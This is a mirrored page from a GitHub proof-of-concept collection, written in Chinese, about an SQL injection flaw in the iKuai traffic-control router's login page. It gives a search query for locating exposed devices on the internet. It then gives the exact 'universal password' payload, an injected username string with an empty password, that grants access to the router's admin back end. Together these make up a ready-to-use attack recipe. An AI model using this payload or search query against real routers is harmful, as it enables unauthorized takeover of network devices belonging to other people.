mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 12:25:11 +00:00
32 lines
460 B
Markdown
32 lines
460 B
Markdown
|
# iKuai 流控路由 SQL注入漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
iKuai 流控路由
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
title="登录爱快流控路由"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
登录页面如下
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
使用万能密码登录后台
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
user: "or""=""or""="
|
|||
|
|
pass: 空
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|